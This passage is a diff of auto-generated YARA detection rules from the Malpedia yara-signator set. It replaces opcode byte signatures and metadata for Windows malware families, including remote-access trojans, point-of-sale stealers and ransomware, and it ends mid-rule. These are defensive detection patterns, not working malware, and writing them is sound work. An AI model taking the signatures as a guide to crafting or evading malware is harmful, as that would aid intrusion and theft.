-		$sequence_5 = { 85c0 7527 6a0c 68???????? 8bcb e8???????? }
-		$sequence_6 = { c645fc01 8b45cc 83f810 7227 8d4801 }
-		$sequence_7 = { c7856cffffff0f000000 c68558ffffff00 6880000000 8d8570ffffff c745fc01000000 }
-		$sequence_8 = { c745d400000000 e8???????? 50 e8???????? 83c408 c745e800000000 8d4dd8 }
-		$sequence_9 = { 8b4314 0f43d6 8b7b10 2bc7 8b4dc8 3bc8 7726 }
+		$sequence_0 = { c1c20d 33f0 8bca 33f2 c1e103 33c8 d1c6 }
+		$sequence_1 = { 8bff 55 8bec 8b4d08 33c0 3b0cc5a8574600 7427 }
+		$sequence_2 = { 80f939 7510 c60630 8b8578ffffff 4e 3bf0 75e0 }
+		$sequence_3 = { 0f8742010000 eb14 8b7d80 83c002 8b75b4 8b8d7cffffff e9???????? }
+		$sequence_4 = { 8b450c 8b5508 8bca c745e800000000 c745ec0f000000 8b38 }
+		$sequence_5 = { 53 8b5d10 56 57 8bf9 33f6 8b07 }
+		$sequence_6 = { 89bd78ffffff 47 897d8c 813900ca9a3b 88559f 0f95c0 895588 }
+		$sequence_7 = { 8bfb 335df8 f7d7 8b4df8 0bd8 f7d1 }
+		$sequence_8 = { c745e428664200 eb08 8d4dd8 e8???????? 837e1808 }
+		$sequence_9 = { 837de800 894da0 894d90 7653 8b03 8d4dc0 51 }
 
 	condition:
-		7 of them and filesize < 884736
+		7 of them and filesize < 1122304
 }
-rule MALPEDIA_Win_Bit_Rat_Auto : FILE
+rule MALPEDIA_Win_Graphican_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f95bf2c0-1a3f-5ba6-86c1-dc6657e9fb49"
+		id = "306b4097-e66d-555f-a881-23bb9c0b513c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bit_rat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphican"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.graphican_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "6a75a2a36ee1576648e5cd3e08166671639be750c77ff100be6cd8e32ca1f573"
+		logic_hash = "4ea64380581d8093475f0f95452d6256bbd394365c1616fdf688ce08e91d23e0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98205,32 +98458,32 @@ rule MALPEDIA_Win_Bit_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb1b 8b4de0 8b5ddc 8b7df8 8b45f4 eba7 8b4510 }
-		$sequence_1 = { e8???????? 8b4f0c 83c404 3b01 740e 6a00 6a00 }
-		$sequence_2 = { e8???????? c645fc42 50 8bce e8???????? c645fc24 53 }
-		$sequence_3 = { 85ed 7460 895c2410 8bd3 8bce 85f6 7454 }
-		$sequence_4 = { e9???????? 83f85b 751b 8bce e8???????? 8bce e8???????? }
-		$sequence_5 = { e8???????? 8b4c240c 83c404 83f903 751b 6a00 6a00 }
-		$sequence_6 = { ff7618 8bd7 e8???????? 8bd8 83c408 8bc2 8bcb }
-		$sequence_7 = { ff75ec ff75e8 ff75fc ff75f8 ff7514 53 eb2a }
-		$sequence_8 = { c3 8bff 55 8bec 5d e9???????? 6a00 }
-		$sequence_9 = { ffb674040000 e8???????? 8bf8 83c408 85ff 0f8595000000 50 }
+		$sequence_0 = { 8bbed0030000 8b5dfc 2bf8 8d04fa 8b51fc 8b7de8 899486e8010000 }
+		$sequence_1 = { 757b 8b4d0c 57 8b7d08 8955fc 894d08 85c0 }
+		$sequence_2 = { 57 c785f0dfffff00000000 ff15???????? 8b85ecdfffff 8b8df0dfffff 53 50 }
+		$sequence_3 = { 8b7de8 899486e8010000 8b45ec 40 43 }
+		$sequence_4 = { 897dc0 3c30 7c04 3c39 7e4b 8b5d08 397318 }
+		$sequence_5 = { 746d 53 8d9ef4030000 807e0400 8bc3 7428 33d2 }
+		$sequence_6 = { 5e c3 33c0 33d2 85c0 5f 0f94c0 }
+		$sequence_7 = { 8b4148 ffd0 8b7dc0 33f6 895dc8 895dc4 }
+		$sequence_8 = { 8b10 50 8b4208 ffd0 8b45c8 3bc3 }
+		$sequence_9 = { 83c40c 50 e8???????? 8bf8 83c404 }
 
 	condition:
-		7 of them and filesize < 19405824
+		7 of them and filesize < 362496
 }
-rule MALPEDIA_Win_Wscspl_Auto : FILE
+rule MALPEDIA_Win_Stop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7d78cbcb-c636-58e3-9d8d-70bd821838ca"
+		id = "bc295ac7-db91-5568-b9e1-1d450db9b984"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wscspl_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stop_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "a06a73900ca2c0d42b899a919a39813227fe95be2c044a4b97a03a121cdc8aa6"
+		logic_hash = "22c4b0b970b8ce1325818e94329339f1bb669a97f8cb3590d85b78790ea24a40"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98244,32 +98497,32 @@ rule MALPEDIA_Win_Wscspl_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f8464020000 8b3d???????? f644243810 8a442464 0f8481000000 3c2e }
-		$sequence_1 = { 885c342c ffd5 a3???????? a3???????? b8???????? }
-		$sequence_2 = { 33d2 33c9 8d5c2418 e8???????? 8b8c2494230000 83c414 5b }
-		$sequence_3 = { c705????????01000000 e8???????? 891d???????? eb25 }
-		$sequence_4 = { 51 50 ff15???????? 2935???????? 83c40c }
-		$sequence_5 = { 5f 8935???????? 5e 5d 8b8c2488230000 }
-		$sequence_6 = { 6a01 50 ff15???????? 687c230000 68c10b0000 }
-		$sequence_7 = { 8d443410 68???????? 50 e8???????? 668b0d???????? }
-		$sequence_8 = { 68ba0b0000 33d2 33c9 8d9c24a4050000 }
-		$sequence_9 = { 2bc1 8b4c2448 03f0 8b442444 ba3f3a0000 }
+		$sequence_0 = { 50 ff15???????? 8bf8 85ff 790f }
+		$sequence_1 = { ff15???????? 8bf8 85ff 790f }
+		$sequence_2 = { 51 dd1c24 e8???????? dc4de0 }
+		$sequence_3 = { 56 6a00 ff7508 68???????? 6a00 }
+		$sequence_4 = { 33c9 eb14 8bce 8d5902 668b01 83c102 6685c0 }
+		$sequence_5 = { 33c9 eb14 8bce 8d5902 }
+		$sequence_6 = { ffd6 85c0 75e2 5f }
+		$sequence_7 = { 68f4010000 57 ff15???????? 57 }
+		$sequence_8 = { 50 ffd6 85c0 75e8 6a0a ff7304 }
+		$sequence_9 = { ff7508 ffd0 5d c3 8b0d???????? 33d2 }
 
 	condition:
-		7 of them and filesize < 901120
+		7 of them and filesize < 6029312
 }
-rule MALPEDIA_Win_Oderoor_Auto : FILE
+rule MALPEDIA_Win_Bernhardpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8af6addc-ebdd-5e5f-9273-b365bc983ffd"
+		id = "252fe43d-34d2-5ba3-916c-e631fcda4c17"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oderoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.oderoor_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bernhardpos_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "705d5b4a266b0c2f312f72fd5cb1e86ab39ec049fd53173701ccf137ec51b933"
+		logic_hash = "a85fc3a62e77b7c1681166d26b96a4f5d23c2afe6eddbdde5dc49efbc64461ae"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98283,32 +98536,32 @@ rule MALPEDIA_Win_Oderoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2deb1427d9 8c2413 b166 3b01 95 1e c194a0c0b855158d }
-		$sequence_1 = { f8 660fbdd9 6611e5 e8???????? 54 }
-		$sequence_2 = { e9???????? 6689442404 c1ce06 9c 9c 8d642440 e9???????? }
-		$sequence_3 = { 69d20a000000 e8???????? 38f4 c0f304 c1c31c 660fbafb02 89c3 }
-		$sequence_4 = { 686c193202 e8???????? 309c865a407526 b3df e04a 9b 68d69156e5 }
-		$sequence_5 = { 2b984e407fc0 c5adcaa19a9e 1882c1c921d4 06 ed }
-		$sequence_6 = { df570e 29dc 9b 7f65 197e7e a2???????? }
-		$sequence_7 = { 0fbae107 0428 55 895c240c f6d0 660fbae70f 9c }
-		$sequence_8 = { 8d642410 e9???????? 66891407 881424 9c 68f4110af5 }
-		$sequence_9 = { f1 6c aa 620b e3ed e28f 1a00 }
+		$sequence_0 = { 8b4508 50 ff15???????? 8945fc c745f800000000 c745f400000000 }
+		$sequence_1 = { 884a02 6a01 ff15???????? 8b8d58feffff }
+		$sequence_2 = { 50 8d8dc8fbffff 51 ff15???????? 6a00 }
+		$sequence_3 = { 8bec 81ec84040000 53 56 57 6a04 }
+		$sequence_4 = { 85c0 0f8488010000 8b45fc 8b4844 51 }
+		$sequence_5 = { 8d8550feffff 50 8d8d5cfeffff 51 6a00 }
+		$sequence_6 = { 8b4dec c1e108 0345e8 03c8 }
+		$sequence_7 = { 8b45e4 c1e806 83e03f 8b4d0c 034df4 }
+		$sequence_8 = { e8???????? a3???????? 68a86b4aa0 a1???????? 50 e8???????? }
+		$sequence_9 = { e8???????? a3???????? 684f5b51f2 a1???????? 50 e8???????? a3???????? }
 
 	condition:
-		7 of them and filesize < 13688832
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Yanluowang_Auto : FILE
+rule MALPEDIA_Win_Safenet_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4468bae4-7d21-5c9c-b3c6-a951c19ed833"
+		id = "f291e692-0cf7-535f-829f-d3eb37065334"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yanluowang"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yanluowang_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.safenet"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.safenet_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "7c2e1069418a1f62952d42a3190c40f6e9223a885e325767a86810d1579f3abb"
+		logic_hash = "8771350f205428c4c7fbcedc7de0eba58fbdfc684579398209f093f9a759ec1a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98322,32 +98575,32 @@ rule MALPEDIA_Win_Yanluowang_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745dc00010001 c745e000010001 c745e400010001 c745e800010001 e8???????? 83c40c }
-		$sequence_1 = { 56 57 50 8d45f4 64a300000000 8995a4fdffff 898da0fdffff }
-		$sequence_2 = { 33733c 334b30 335338 8bc1 0bce 33f7 23f8 }
-		$sequence_3 = { 8b442438 336c2434 03d5 0fb6e8 c1e808 339cae00040000 33d8 }
-		$sequence_4 = { c744242c00000000 8bc3 b902000000 f7f6 807c241300 8bf0 8b442418 }
-		$sequence_5 = { 7402 890b 3355e8 8d4808 85c9 7402 }
-		$sequence_6 = { 0fbe41ff 8d04c528984400 ebbd 8a11 }
-		$sequence_7 = { ebdf c745e4b4a44400 c745e803000000 ebcf c745e4b8a44400 ebbf c745e4c0a44400 }
-		$sequence_8 = { 0f87f4010000 0fb680bbc94200 ff24859fc94200 8365e400 8d4de4 8365e800 6a7b }
-		$sequence_9 = { ff742418 6a00 6a00 6a04 6a01 }
+		$sequence_0 = { 8d4db4 50 c645fc01 e8???????? 8b4d08 }
+		$sequence_1 = { ff15???????? eb5a ff75fc ff15???????? }
+		$sequence_2 = { 8b45fc 3bc3 7504 c6461401 }
+		$sequence_3 = { 51 8d8d7cffffff ff7634 51 50 ffd3 85c0 }
+		$sequence_4 = { 68???????? 57 ff15???????? 3bc6 7505 83ceff }
+		$sequence_5 = { 3b1d???????? 0f8315010000 8bc3 8bcb c1f805 83e11f 8b048540174100 }
+		$sequence_6 = { 50 ff7638 57 ff7618 ff55f8 }
+		$sequence_7 = { 8d34b5d0d84000 83c00c 3bc6 7305 395004 }
+		$sequence_8 = { ff750c e8???????? ff75ec e8???????? ff75e8 e8???????? }
+		$sequence_9 = { c745bc3c000000 c745c040040000 ff15???????? 8945c4 8d85b4fdffff 8945cc }
 
 	condition:
-		7 of them and filesize < 834560
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Xenarmor_Auto : FILE
+rule MALPEDIA_Win_Noxplayer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "55610d93-1ce0-5ea9-b26e-9c8f1380484b"
+		id = "52c2d792-4208-534f-9752-70135571b141"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xenarmor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xenarmor_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.noxplayer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.noxplayer_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "10c19019c6e353e0437445c705fdac1c2ec6dd84cb0e3e79b7bc1280d736134b"
+		logic_hash = "39f8c0f5aeb72bc127d7da1eaa9ec4c91ef0378727bf180400ab0a14310839c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98361,32 +98614,32 @@ rule MALPEDIA_Win_Xenarmor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f7f9 8b8d64ffffff 6640 66034616 8bd0 e8???????? f7462440010000 }
-		$sequence_1 = { e8???????? 8bf0 83c418 85f6 0f84ed000000 8d8584e5ffff 8d8dfcd1ffff }
-		$sequence_2 = { e8???????? 50 8d4d08 c645fc03 e8???????? c645fc00 8bc7 }
-		$sequence_3 = { e9???????? ff7304 8b53bc ff73e0 8b4d0c e8???????? 83c408 }
-		$sequence_4 = { ff742428 ba56000000 ff742428 e8???????? 83c40c eb33 8b542420 }
-		$sequence_5 = { 8bf0 e8???????? 8b5df0 8bf8 57 56 ba35000000 }
-		$sequence_6 = { 8d8ff8000000 e8???????? 895de8 c745e4d4ee6800 ff750c 8d4de4 895dfc }
-		$sequence_7 = { f6400408 0f8589000000 83783000 8b44246c 741c 85c0 7518 }
-		$sequence_8 = { ba74000000 e8???????? 83c40c eb37 8d4201 89416c 8d0c92 }
-		$sequence_9 = { 8bce e8???????? 685e010000 8bce e8???????? 8b86a8b30500 038690b30500 }
+		$sequence_0 = { 57 4883ec20 488b7968 488d05833a0300 488bd9 488901 4885ff }
+		$sequence_1 = { 33db 48391d???????? 488bf8 0f85d5000000 488d0d6fc70000 ff15???????? }
+		$sequence_2 = { 488d15757f0200 48894c2420 4885c9 7419 483901 750f 488b4108 }
+		$sequence_3 = { 488b742450 488bc3 4883c440 5b c3 488d542430 4533c9 }
+		$sequence_4 = { 49c7430801000000 8b530c 85d2 743e 660f1f440000 448d42ff 41d1f8 }
+		$sequence_5 = { eb06 488bd8 488b00 80782900 74e8 483b5908 }
+		$sequence_6 = { 4c8be8 0fb6465c 84c0 0f8553040000 4533e4 488b4e50 e8???????? }
+		$sequence_7 = { 742b 488bcf e8???????? 483b3d???????? 741a 488d05354c0200 483bf8 }
+		$sequence_8 = { 4c8d4204 e8???????? eb78 488b4f50 498bd4 488b01 ff5040 }
+		$sequence_9 = { 41390424 745d 807b1d00 754a 488b4310 80781d00 7520 }
 
 	condition:
-		7 of them and filesize < 10894336
+		7 of them and filesize < 742400
 }
-rule MALPEDIA_Win_Project_Wood_Auto : FILE
+rule MALPEDIA_Win_Swen_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "99ac0756-7270-5092-a0e9-372c792f0f89"
+		id = "01c07f06-713c-58de-abb2-d741b6b7f019"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.project_wood"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.project_wood_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.swen"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.swen_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "d6cbe15bf8f450c37b272bcbe4cde2ce46e9a95962a04b9a673413f1c7fe9c2a"
+		logic_hash = "c23034223b381f25ac775fe21bfc90a4b7d7644747556b010494835d089cdb6c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98400,32 +98653,32 @@ rule MALPEDIA_Win_Project_Wood_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7404 6aff eb05 6830750000 53 8d45e8 57 }
-		$sequence_1 = { 57 50 ff7508 ff15???????? 85c0 7426 ff37 }
-		$sequence_2 = { ffd5 68???????? e8???????? 59 5e 5d 5b }
-		$sequence_3 = { 7422 8d4df8 b801000080 51 6819000200 57 68???????? }
-		$sequence_4 = { ff7508 e8???????? 83c41c 84c0 0f84abfeffff 8d8550f7ffff }
-		$sequence_5 = { 0f8426010000 8d45d8 50 8d85acfeffff 50 ff15???????? 8d45e4 }
-		$sequence_6 = { 41 83f902 72e3 a3???????? eb10 c705????????01000000 891d???????? }
-		$sequence_7 = { ab ab 66ab aa 8d45f0 c745f050000000 50 }
-		$sequence_8 = { 7222 8d85a4f7ffff 6a04 50 8d450c 50 e8???????? }
-		$sequence_9 = { 0f84e3feffff 57 8d45f8 ff7518 ff7514 50 8d8558f7ffff }
+		$sequence_0 = { 68???????? 8d85e0fdffff 50 e8???????? 59 59 53 }
+		$sequence_1 = { 895dfc 68c8000000 53 68???????? e8???????? 83c40c 891d???????? }
+		$sequence_2 = { 8d8564ffffff eb03 8d45c8 50 8d8540feffff 50 e8???????? }
+		$sequence_3 = { 85c0 740a e8???????? e9???????? 8d85bcfcffff 50 }
+		$sequence_4 = { 0f84f8020000 8d7801 803f79 750a c78574feffff01000000 8818 8d8581feffff }
+		$sequence_5 = { 85c0 0f85ccfdffff 6820bf0200 e8???????? 59 8bf8 89bd1cfeffff }
+		$sequence_6 = { 83c40c 85c0 750c 834dfcff 6a01 58 e9???????? }
+		$sequence_7 = { 680000aa00 ff15???????? 8945d0 6a08 ff15???????? 50 ff75a8 }
+		$sequence_8 = { 57 6a01 68???????? bb???????? 53 bf02000080 57 }
+		$sequence_9 = { 7456 6a02 53 53 57 ff15???????? ff7508 }
 
 	condition:
-		7 of them and filesize < 31137792
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Glassrat_Auto : FILE
+rule MALPEDIA_Win_Flawedgrace_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e9bc70a4-a165-546a-8b42-f2a0c16e09f0"
+		id = "38c84019-ad8d-570b-aa3f-e7acbb9a406b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.glassrat_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flawedgrace_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "fbe939a1762c88ca3785e6b1a0e31abcf86d2dba3555094a224ffc73c72353a2"
+		logic_hash = "c317abd86b3ba4cb04110fcc0785854b53fd3854465be9cdca5825ec671c6c3a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98439,32 +98692,32 @@ rule MALPEDIA_Win_Glassrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 32c0 5d 83c408 c21400 53 56 8d4524 }
-		$sequence_1 = { 895904 894108 89790c 8b4a04 e8???????? }
-		$sequence_2 = { 0f8598000000 bf02000000 ff15???????? 6a00 8b95c4feffff }
-		$sequence_3 = { 6860ea0000 ff15???????? 8d8c242c010000 c784243c020000ffffffff e8???????? 46 83fe05 }
-		$sequence_4 = { 8d5004 8945ec 8930 b941000000 33c0 8bfa }
-		$sequence_5 = { 8d9578feffff 53 53 6a02 }
-		$sequence_6 = { c7857cffffff44000000 c745a801010000 668975ac 895db8 895dbc }
-		$sequence_7 = { 8dbd85feffff 8945e0 8945e4 889d84feffff f3ab 66ab }
-		$sequence_8 = { 33ed 68905f0100 ff15???????? 6a00 }
-		$sequence_9 = { e8???????? 53 55 56 33c0 8bf1 89442410 }
+		$sequence_0 = { 8bcf e8???????? 83c404 85c0 0f84a8010000 0f31 52 }
+		$sequence_1 = { 0fb6c0 894dec 8bcb c1e918 8b0485e0bb4500 33048de0bf4500 894510 }
+		$sequence_2 = { c6853bf5ffff00 c6853cf5ffffff c6853df5ffff25 c6853ef5ffff30 c6853ff5ffff20 c68540f5ffff40 c68541f5ffff00 }
+		$sequence_3 = { c6858ddaffff33 c6858edaffff00 c6858fdaffff00 c68590daffff00 c68591daffff00 c68592daffff00 c68593daffff00 }
+		$sequence_4 = { c68565f2ffff00 c68566f2ffff85 c68567f2ffffc0 c68568f2ffff74 c68569f2ffff3a c6856af2ffff81 c6856bf2ffff7d }
+		$sequence_5 = { 7416 8b85ccc0ffff 50 6a00 ff15???????? }
+		$sequence_6 = { 8b0495b8d34600 f644082801 7421 57 e8???????? 59 50 }
+		$sequence_7 = { c685abfdffff00 c685acfdffff00 c685adfdffff00 c685aefdffff00 c685affdffff00 c685b0fdffff00 c685b1fdffff00 }
+		$sequence_8 = { 3934bdb8d34600 7531 e8???????? 8904bdb8d34600 85c0 7514 6a0c }
+		$sequence_9 = { c685d3c8ffff05 c685d4c8ffff00 c685d5c8ffff00 c685d6c8ffff00 c685d7c8ffffe8 c685d8c8ffff48 c685d9c8ffff0f }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 966656
 }
-rule MALPEDIA_Win_Skynet_Auto : FILE
+rule MALPEDIA_Win_Windealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "696c4936-7a3d-5b86-95a5-a0774cacd4ab"
+		id = "87b31818-e67b-5c82-9927-08d581ce1fca"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skynet"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.skynet_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.windealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.windealer_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "1d32da1d46f2bb7e98914cbd9405f4812d3bd3786d6edfb45c62833d68ff1301"
+		logic_hash = "cda4114916f5f955b9ea27c4701626023386bb93ae37a566cf799b5d0e98aca8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98478,32 +98731,32 @@ rule MALPEDIA_Win_Skynet_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8ba42438010000 4c8b4c2460 48b8ffffffffffffff7f 4c898c2430010000 4889bc2440010000 4939c4 }
-		$sequence_1 = { 4889d9 e8???????? 4889f1 e8???????? 488d8c24b0000000 e8???????? 4c89f1 }
-		$sequence_2 = { 0fb654243f 4889c8 4883e0fc 4809d0 48894520 e8???????? 488d8c24b0000000 }
-		$sequence_3 = { 488d059c478b00 31d2 4889f1 48894310 4883c028 48898380000000 e8???????? }
-		$sequence_4 = { 4889cb 488d0d21fd8900 e8???????? 4889c2 488b03 488b4008 488b04d0 }
-		$sequence_5 = { 4c894c2428 488d5001 e8???????? 4c8b4c2428 488b442420 4c894c2430 }
-		$sequence_6 = { 488b01 4889cb 480358e8 488d0586478a00 488903 488b05???????? 488d4b18 }
-		$sequence_7 = { 48c783b801000000000000 488983a8010000 0fb787e0000000 488d7b10 4889f9 668983b0010000 488d053dde8d00 }
-		$sequence_8 = { c705????????01000000 4883c010 488905???????? e8???????? 488d35d1c58b00 488b15???????? 664d0f6ec5 }
-		$sequence_9 = { e8???????? 488b4c2460 4c39e9 740f 488b442470 488d540002 e8???????? }
+		$sequence_0 = { 6a00 ff15???????? 85c0 7407 50 ff15???????? 6a01 }
+		$sequence_1 = { 6a04 50 6a04 68???????? 68???????? }
+		$sequence_2 = { 668b91d2070000 8a89d0070000 52 51 }
+		$sequence_3 = { 56 57 68da070000 e8???????? }
+		$sequence_4 = { 8b4d08 668b91d2070000 8a89d0070000 52 51 }
+		$sequence_5 = { 6a01 50 56 e8???????? 83c410 8bc7 }
+		$sequence_6 = { 53 56 57 68da070000 }
+		$sequence_7 = { 50 56 e8???????? 83c410 8b4618 }
+		$sequence_8 = { ff15???????? 85c0 7407 50 ff15???????? 6a01 }
+		$sequence_9 = { 8b4d08 668b91d2070000 8a89d0070000 52 }
 
 	condition:
-		7 of them and filesize < 20419584
+		7 of them and filesize < 770048
 }
-rule MALPEDIA_Win_Linseningsvr_Auto : FILE
+rule MALPEDIA_Win_Rustock_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "68c65b63-e40e-59ed-9f87-895cfc0dec94"
+		id = "81c11374-a224-57b2-ae9d-b05ee172db6b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.linseningsvr"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.linseningsvr_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rustock_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "e8f369f7ec61592e2a3b3fecf4bc420063f67a74461c185ad8f3d77705dffe45"
+		logic_hash = "f23c8787fe5677c0679006ea20fcb161a3a7545dab517b9c25455040e02f455c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98517,32 +98770,32 @@ rule MALPEDIA_Win_Linseningsvr_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 8dbc24dd090000 c644241000 f3ab 66ab aa }
-		$sequence_1 = { 8d542464 6a01 52 89442464 894c2468 e8???????? }
-		$sequence_2 = { 8dbc24dd090000 c644241000 f3ab 66ab }
-		$sequence_3 = { 8b0485c08d4000 03c6 8a5004 f6c201 }
-		$sequence_4 = { e8???????? 57 e8???????? 83c418 8d44244c }
-		$sequence_5 = { 742e 85f6 7419 0fb6da f683818c400004 }
-		$sequence_6 = { c705????????01000000 50 a3???????? e8???????? 8db6bc884000 }
-		$sequence_7 = { e8???????? 83c40c c3 53 56 be???????? 57 }
-		$sequence_8 = { 8a4c3c4c 51 68???????? e8???????? 83c408 }
-		$sequence_9 = { e8???????? 83c404 ebc2 8b0d???????? 68???????? 51 }
+		$sequence_0 = { ff15???????? 8945c0 85c0 7504 33f6 eb21 ff751c }
+		$sequence_1 = { f7d1 8b15???????? 8d6424fc 893424 5a 31c6 }
+		$sequence_2 = { 7403 46 ebd4 0fb60e 46 83f92d 8bd1 }
+		$sequence_3 = { 29f8 83cbff f7d3 b8670e0100 8d0dc8680100 01d0 }
+		$sequence_4 = { 53 ffd6 68ad020000 53 a3???????? ffd6 689d020000 }
+		$sequence_5 = { df7809 60 9f 79c1 7cc2 }
